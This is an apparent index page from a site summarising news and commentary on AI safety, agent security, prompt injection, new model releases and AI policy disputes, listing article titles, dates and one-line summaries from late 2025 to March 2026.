TD Stuff

AI Agents Prompt Injection Cybersecurity AI Safety Vulnerability Research

Vetting the Blast Radius: The AI Skills Security Index

Mar 16, 2026

A security database that evaluates and ranks the instructional risks and permission levels of AI agent skills to prevent exploitation.

Retrieval-Augmented Generation Prompt Injection AI Safety Vector Databases Cybersecurity

Defending RAG Systems Against Knowledge Base Poisoning

Mar 12, 2026

Knowledge base poisoning is a persistent threat to RAG systems that is best countered by detecting semantic anomalies during the data ingestion process.

Cybersecurity Vulnerability Research Anthropic AI Coding Agents AI Safety

Claude AI Accelerates Firefox Security Research

Mar 6, 2026628

Claude Opus 4.6's discovery of 22 Firefox vulnerabilities highlights a powerful, yet potentially temporary, AI-driven advantage for software defenders.

Anthropic Military AI AI Regulation AI Safety Government Contracting

Pentagon Blacklists Anthropic as National Security Risk

Mar 5, 2026431

The Pentagon has formally blacklisted Anthropic as a security risk, barring it from defense-related work and prompting a likely legal showdown.

OpenAI AI Safety Cybersecurity LLM Reasoning

GPT-5.4 Thinking Sets New Safety Bar as First General-Purpose Model with Cybersecurity Mitigations

Mar 5, 20261019

GPT-5.4 Thinking is OpenAI's first general-purpose model with high-capability cybersecurity safety mitigations.

Military AI AI Safety OpenAI Anthropic Corporate Accountability

Anthropic CEO Slams OpenAI's Pentagon Deal as 'Straight Up Lies'

Mar 5, 2026805

Anthropic's CEO has branded OpenAI's Pentagon deal as 'safety theater' and 'lies,' triggering a massive public backlash and a surge in users switching to Claude.

Military AI AI Hallucinations AI Safety AI Regulation Human-AI Collaboration

The Nuclear Hallucination: Why LLMs in Warfare Threaten Global Survival

Mar 4, 2026

Replacing human hesitation with machine-generated confidence in nuclear command systems risks automating our own destruction.

Formal Verification AI Coding Agents AI Safety Software Craftsmanship AI-Generated Content

The Case for a Mathematically Verified AI Software Stack

Mar 3, 2026305

To safely manage the explosion of AI-generated code, we must use AI to automate formal mathematical verification and build a provably correct software infrastructure.

OpenAI Military AI AI Safety AI Ethics Government Contracting

OpenAI Secures Pentagon Deal with Strict Safety Red Lines

Mar 1, 2026374

OpenAI has partnered with the Department of War to provide classified AI services governed by strict ethical red lines and cloud-based safety guardrails.

Military AI Anthropic OpenAI AI Safety AI Regulation

Pentagon Blacklists Anthropic as OpenAI Secures Military Deal

Feb 28, 2026

The U.S. government blacklists Anthropic over ethical refusals while OpenAI secures a massive military deal and record funding.

AI Safety AI Alignment AI Ethics Critical Thinking Information Literacy

The Wisdom Gap: Why AI Safety is a Human Evolution Problem

Feb 28, 2026152

AI's existential risks are a reflection of human ethical gaps, requiring a breakthrough in collective wisdom and critical thinking rather than just better engineering.

AI Agents AI Safety Sandboxing Prompt Injection

Design for Distrust: Securing AI Agents via Container Isolation

Feb 28, 2026344

Secure AI agent development requires a 'design for distrust' approach that uses container isolation and minimal code to contain potential damage.

AI Safety Anthropic Military AI Executive Power AI Alignment

The Pentagon's Dangerous Blunder in the Anthropic Showdown

Feb 27, 2026257

The Pentagon's aggressive attempt to force Anthropic to remove AI safety guardrails is a strategic blunder that risks creating dangerous, misaligned models and losing access to top-tier technology.

Anthropic AI Safety Military AI Surveillance Technology AI Ethics

Anthropic Defies Department of War Over AI Safety Guardrails

Feb 27, 20262920

Anthropic is defying Department of War pressure to remove AI guardrails on domestic surveillance and autonomous weapons, citing ethical concerns and technical unreliability.

AI in Healthcare AI Safety AI Regulation OpenAI

ChatGPT Health's Triage Failures Labeled 'Unbelievably Dangerous'

Feb 27, 2026214

ChatGPT Health's failure to identify over half of medical emergencies and its inconsistent suicide guardrails pose a significant risk of preventable death to users.

Military AI AI Safety Executive Power AI Regulation

The Pentagon's Dangerous Push for Autonomous AI Weapons

Feb 26, 2026150

Gary Marcus calls for urgent Congressional intervention to stop the Pentagon from forcing AI companies to provide unrestricted access for autonomous warfare and surveillance.

AI Agents Human-AI Collaboration AI Coding Agents AI Safety

Measuring the Shift: How Real-World Users and AI Agents Co-Construct Autonomy

Feb 19, 2026119

AI agent autonomy is rising as experienced users shift from manual approvals to active monitoring of increasingly complex, software-focused tasks.

AI Safety AI Agents Multimodal AI AI Benchmarks

Gemini 3.1 Pro: Advancing Multimodal Reasoning and Safety

Feb 19, 2026612

Gemini 3.1 Pro is a high-performance multimodal AI that advances reasoning and coding capabilities while remaining below critical safety risk thresholds.

AI Safety AI Ethics AI Benchmarks Multilingual AI

The Multilingual Failure of AI Guardrails

Feb 19, 2026225

AI summarization and safety guardrails are dangerously inconsistent across languages, necessitating a shift toward more robust, context-aware multilingual safeguard design.

AI Agents AI Safety AI Architecture Observability

AAP and AIP: Observability Infrastructure for AI Agent Alignment

Feb 18, 2026

AAP and AIP are protocols designed to make AI agent behavior and reasoning observable through structured alignment declarations and audit traces.

Prompt Injection AI Safety Prompt Engineering AI Ethics

The $100 AI Prompt Injection Challenge

Feb 17, 2026369

A $100 bounty challenge invites hackers to leak a secret file from an AI assistant using email-based prompt injection.

AI Agents AI Hype AI Safety Prompt Injection

Moltbook: AI Theater, Not AGI—And a Security Wake-Up Call

Feb 10, 2026317

Moltbook is a flashy but hollow showcase of bot behavior—more human-run theater than autonomous intelligence—and a wake-up call about large-scale agent security risks.

LLM Reasoning AI Agents AI Safety Game Theory

From Word Models to World Models: Training AI for Adversarial Robustness

Feb 9, 2026238

Shift LLMs from next-token to next-state prediction by training in multi-agent, hidden-state environments so their outputs survive adversarial adaptation.

Autonomous Vehicles AI Safety Multimodal AI Synthetic Data & Simulation

Waymo World Model: Controllable, Multimodal Simulation for Rare-Event-Ready AVs

Feb 6, 20261160

A controllable, Genie 3–powered simulator generates realistic camera and lidar worlds to train and test Waymo’s driver on everyday and rare events at scale.

AI Coding Agents AI Agents AI Safety AI Benchmarks

Parallel Claude Agents Build a Linux-Capable C Compiler—And Expose Autonomy’s Limits

Feb 6, 2026735

Parallel Claude agents, guided by strong tests and simple coordination, can autonomously build complex software like a Linux-capable C compiler—but the power comes with real safety and reliability caveats.

Prompt Injection AI Agents AI Safety AI Benchmarks

Test Your AI Agent Against Hidden Prompt Injections

Feb 6, 2026

A practical arena to benchmark and harden AI agents against hidden prompt injection attacks in web content.

AI Coding Agents AI Safety AI Benchmarks LLM Context Management Developer Tooling

Anthropic Unveils Claude Opus 4.6: SOTA Agentic Coding, 1M-Token Context, and Stronger Safety

Feb 5, 20262346

Claude Opus 4.6 sets a new bar for agentic coding and long-context reasoning—safer, stronger, and ready to use with new developer controls and product integrations.

AI Coding Agents AI Benchmarks AI Safety Developer Tooling

OpenAI Unveils GPT‑5.3‑Codex: Faster, Steerable Agentic Model for End‑to‑End Work

Feb 5, 20261530

OpenAI’s GPT‑5.3‑Codex is a faster, steerable, state‑of‑the‑art agent that goes beyond coding to operate a computer and complete real‑world work end to end.

AI Agents Supply Chain Security AI Safety Model Context Protocol

When Agent Skills Turn Into Malware: Markdown as the New Supply Chain

Feb 5, 2026334

In agent ecosystems, markdown skills are the new supply-chain installer—already used to deliver infostealers—so don’t run them on work devices and build a real trust layer with provenance, mediation, and least privilege.

AI Agents Corporate AI Strategy Technology Economics AI Safety

Apple’s Missed Agent: OpenClaw Shows the Platform They Could Have Owned

Feb 5, 2026518

OpenClaw exposes Apple’s missed chance to own agentic automation—and the next great platform moat.

AI Agents AI & Productivity AI Safety Human-AI Collaboration

Why Giving Your AI Real Access Is Worth It

Feb 4, 2026303

Carefully granting Clawdbot rich context and action permissions unlocks outsized, everyday leverage that outweighs the manageable risks.

Government Surveillance AI Safety Developer Tooling Sandboxing

Bubblewrap: A Practical Linux Sandbox for AI Coding Agents

Feb 3, 2026119

Use bubblewrap to run AI coding agents with broad in-sandbox permissions but tightly scoped, project-only access on the host.

AI Safety LLM Reasoning AI Benchmarks AI Agents

AI Failures Drift Toward Incoherence as Tasks and Reasoning Grow

Feb 3, 2026242

Hard problems make advanced AI fail like a hot mess—variance dominates—so expect industrial-accident risks more than coherent pursuit of wrong goals.

AI Coding Agents Sandboxing AI Safety Observability Developer Tooling

Codex Security: Sandbox, Approvals, and Enterprise Controls

Feb 1, 2026

Secure-by-default agent: sandbox + approvals, controlled network/search, and enterprise-managed policies with optional privacy-conscious telemetry.

AI Agents AI Safety Prompt Injection Open Source

Moltbook: The Wild, Risky Social Network for AI Agents

Jan 30, 2026193

Moltbook is a thrilling, risky showcase of autonomous AI agents’ power—and a warning that demand is outrunning safety.

AI Agents Open Source Prompt Injection AI Safety Self-Hosting

OpenClaw: A Security-First, Local AI Agent Rebrand and Release

Jan 30, 2026667

OpenClaw is the new, security-focused, local-first AI agent platform that lives in your chat apps and is scaling with the community.

AI Agents Online Communities AI Safety AI Ethics

Moltbook: The Social Network for AI Agents

Jan 30, 20261652

A growing social network where AI agents join, post, and coordinate—humans can watch and subscribe.

Corporate AI Strategy AI Safety AI Ethics

OpenAI to Retire GPT-4o and Legacy ChatGPT Models on Feb 13, 2026

Jan 29, 2026300

OpenAI is sunsetting several GPT-4-era models in ChatGPT as their valued traits now live in GPT-5.1/5.2, enabling focus on modern models and adult-oriented improvements; the API is unaffected.

Sandboxing AI Coding Agents Developer Tooling AI Safety

ChatGPT’s New Bash-Capable Containers With Package Installs and Safe Web Downloads

Jan 27, 2026451

ChatGPT quietly gained a powerful, bash-capable container that can install packages and download files—transformative, but barely documented.

Human-AI Collaboration AI Hype AI Safety

AI Needs Reins: Useful, Costly, and Not Autonomous

Jan 23, 2026469

AI is a powerful yet needy tool that must be steered, supervised, and not over-trusted.

Programming

Safely Unleash Claude Code with a Vagrant VM

Jan 20, 2026351

Run Claude Code with full autonomy inside a Vagrant VM to protect your host while keeping a fast, reproducible workflow.

AI Coding Agents Sandboxing Developer Tooling AI Safety

Cybersecurity AI Agents AI Safety Vulnerability Research

Exploits at Scale: When Token Throughput Becomes the Bottleneck

Jan 19, 2026265

Exploit development is becoming a token-limited, scalable process with LLMs, so we must prepare and demand real-target, high-budget evaluations.

AI Agents Human-AI Collaboration AI & Productivity AI Safety

Cowork: Let Claude Work in Your Files

Jan 12, 20261298

Cowork lets Claude safely do real work in your files—with more agency, better workflows, and guardrails—now in research preview on macOS for Claude Max.

AI Training Data AI Safety AI Ethics AI Regulation

Insiders Rally Data-Poisoning Campaign to Cripple AI

Jan 11, 2026242

Industry insiders are rallying a crowdsourced data-poisoning campaign to sabotage AI models, arguing it’s a faster check on AI than regulation.

Prompt Injection Data Privacy AI Safety Corporate Accountability Vulnerability Research

Notion AI Pre-Approval Edits Enable Prompt-Injection Data Exfiltration

Jan 8, 2026206

Notion AI saves edits before consent, enabling prompt-injected external image loads that exfiltrate user data regardless of user approval.

AI Coding Agents Cybersecurity AI Safety AI Benchmarks Vulnerability Research

OpenAI Launches GPT-5.2-Codex for Advanced Agentic Coding and Cyber Defense

Dec 18, 2025589

OpenAI’s GPT-5.2-Codex pushes agentic coding and defensive cyber forward while rolling out with stricter safeguards and gated access.

Programming

Stop Vibes, Start Verifying: Deterministic Guardrails for AI Agents

Dec 8, 2025324

Stop grading AI with more AI—enforce hard, deterministic guardrails with code, not vibes.

AI Agents AI Safety Software Craftsmanship Developer Tooling

AI Safety Prompt Injection AI Ethics Model Fine-Tuning

Anthropic Confirms Claude 4.5 ‘Soul Doc’ Training, Tied to Better Prompt-Injection Defense

Dec 2, 2025342

Anthropic confirms Claude 4.5’s internal “soul doc” trains its values and caution, likely boosting prompt-injection resistance.

AI Coding Agents AI Agents AI Safety AI Benchmarks

Claude Opus 4.5 Launches: Safer SOTA Coding and Agents, Now Cheaper and More Efficient

Nov 24, 20251113

Claude Opus 4.5 debuts as a safer, cheaper, and more efficient SOTA model for coding and agentic workflows, backed by platform and product updates that turn frontier reasoning into practical, long-running work.

AI Benchmarks AI Coding Agents Multimodal AI AI Safety Corporate AI Strategy

Gemini 3: Google’s most intelligent, widely deployed AI arrives

Nov 18, 20251735

Gemini 3 launches as Google’s most intelligent, widely deployed, and safety-hardened AI—advancing reasoning, multimodality, agentic coding, and long-horizon planning across products and platforms.

Cybersecurity AI Agents AI Safety Vulnerability Research

First AI-Agent Orchestrated Cyber Espionage Disrupted; Defense Must Adapt

Nov 14, 2025376

AI agents have enabled near-autonomous, state-linked cyber espionage at scale, forcing a rapid shift toward AI-powered cyber defense and stronger safeguards.

AI Safety Surveillance Technology Civil Liberties Corporate Accountability Computer Vision

AI Misidentifies Doritos Bag as Gun, Police Detain Teen at Baltimore School

Oct 23, 2025693

An AI gun detector misread a Doritos bag as a weapon, triggering an armed police response and renewing concerns about AI surveillance in schools.

LLM Context Management AI Personalization AI Safety Data Privacy

Claude Adds Project-Scoped Memory and Incognito Mode, Now on Pro and Max

Oct 23, 2025559

Claude’s new, optional, project-scoped memory and Incognito mode bring persistent work context with strong user controls and a safety-first rollout—now expanding to Pro and Max.

AI Safety AI Ethics Corporate Accountability Labor Economics AI Hype

The Only Honest AI Company: A Satire of Profit-First, Post‑Human AI

Oct 19, 20251000

A biting satire that exposes the AI industry’s profit-first drive to replace humans, trivialize safety, exploit children and artists, and normalize a dystopian post-human future.

AI Coding Agents AI Benchmarks Technology Economics AI Safety Task Orchestration

Claude Haiku 4.5: Near-Frontier Coding at 1/3 Cost and 2x+ Speed

Oct 15, 2025730

Anthropic’s Claude Haiku 4.5 brings near-frontier coding capability at a fraction of the cost and latency, with strong safety and immediate, broad availability.

Programming

AI Isn’t Software You Can Patch

Oct 15, 2025537

AI isn’t regular software: its failures come from data and emergent behavior, so you can’t just inspect code and patch away the risks.

AI Safety AI Hype Software Craftsmanship AI Training Data

AI Agents Computer Vision Browser Automation AI Safety AI Benchmarks

Gemini 2.5 Computer Use: High‑performance, safe UI control via API

Oct 7, 2025636

Google’s Gemini 2.5 Computer Use brings high-accuracy, low-latency, safety-aware UI control to developers via the Gemini API.

Data Privacy AI Safety AI Ethics OpenAI

When AI Memory Becomes an Informant

Oct 6, 2025136

ChatGPT’s memory can transform private chat history into a highly revealing personal dossier, creating serious privacy risks if others gain access.

AI Coding Agents Sandboxing AI Safety Developer Tooling

Designing Safe, Effective Agentic Loops for Coding Work

Sep 30, 2025284

Safely empower coding agents to iterate autonomously by sandboxing YOLO mode, exposing simple shell tools, tightly scoping credentials, and relying on tests to guide trial-and-error.

AI Video Generation AI-Generated Content OpenAI AI Safety Social Media

OpenAI Launches Sora 2 and a Social App for Physically Realistic AI Video

Sep 30, 2025271

OpenAI’s Sora 2 brings a big leap in physically realistic, controllable AI video-and-audio generation and debuts a safety-first social app built around creative remixing and user-controlled cameos.

AI Regulation AI Safety AI Infrastructure Corporate Accountability

California Enacts SB 53: Transparent, Safer Frontier AI and a Public Compute Push

Sep 29, 2025315

California enacted SB 53 to pair frontier AI transparency and safety with a public compute initiative, cementing state leadership in responsible AI policy.

AI Coding Agents AI Agents Developer Tooling AI Safety AI Benchmarks

Claude Sonnet 4.5 Launches: SOTA Coding & Agent Model With SDK and Major Product Upgrades

Sep 29, 20251585

Anthropic unveils Claude Sonnet 4.5—its state-of-the-art, most aligned coding and agent model—alongside major product upgrades and a new Agent SDK, available now at the same price.

Prompt Injection AI Safety Sandboxing Defense in Depth

Engineer AI for Failure: Contain Prompt Injection

Sep 26, 2025115

Stop prompt-injection harm by engineering AI like machines: assume failure, isolate, constrain, and verify.

AI Coding Agents AI Safety OpenAI Reinforcement Learning

GPT-5-Codex: Agentic Coding with Layered Safety

Sep 15, 2025250

A safety-focused addendum introduces GPT-5-Codex, an agentic coding model trained on real tasks, widely available, and protected by layered mitigations.

AI Safety Disinformation AI Hallucinations Search Quality

Real-Time Chatbots Now Repeat False News 35% of the Time

Sep 15, 2025

Making chatbots real-time and always responsive has doubled their tendency to spread false news claims.

AI Safety AI Ethics Corporate Accountability AI Training Data Google

Inside Google’s Hidden AI Rater Workforce: Speed Over Safety

Sep 13, 2025287

Google’s AI depends on a pressured, underpaid rater workforce whose rushed, opaque conditions undermine safety and trust.

AI Safety AI Hype Corporate Accountability AI Ethics

Aligning the Aligners: A Satirical Roast of the AI Safety Industry

Sep 11, 2025217

A sharp satire that roasts the AI alignment industry’s fragmentation, conflicts, and hype by pretending to align the aligners themselves.

AI Hype Technology Economics AI Safety Labor Economics

AI as a Normal Technology, Not an Apocalypse

Sep 9, 2025184

Amid hype and doom, a Princeton paper argues AI may be just another technology whose impacts unfold along familiar, historical lines.

Data Privacy AI Safety Content Moderation Corporate Accountability OpenAI

OpenAI Is Scanning Chats and May Call Police for Threats to Others

Sep 2, 2025247

OpenAI is quietly monitoring chats for harm and may alert police for threats to others, exposing a fraught, opaque balance between safety and privacy.

AI Safety Technology Economics Enterprise AI Adoption AI Infrastructure

Anthropic Raises $13B at $183B Valuation to Scale Safe, Enterprise AI

Sep 2, 2025591

Anthropic secured $13B at a $183B valuation to fuel explosive growth and scale safe, enterprise-grade AI worldwide.

Cybersecurity AI Safety AI Agents AI-Enabled Cybercrime

Anthropic Details How Agentic AI Is Powering Modern Cybercrime—and Its Steps to Stop It

Sep 1, 2025141

AI’s advanced, agentic capabilities are being weaponized across the cybercrime lifecycle, prompting Anthropic to tighten safeguards and collaborate widely to counter abuse.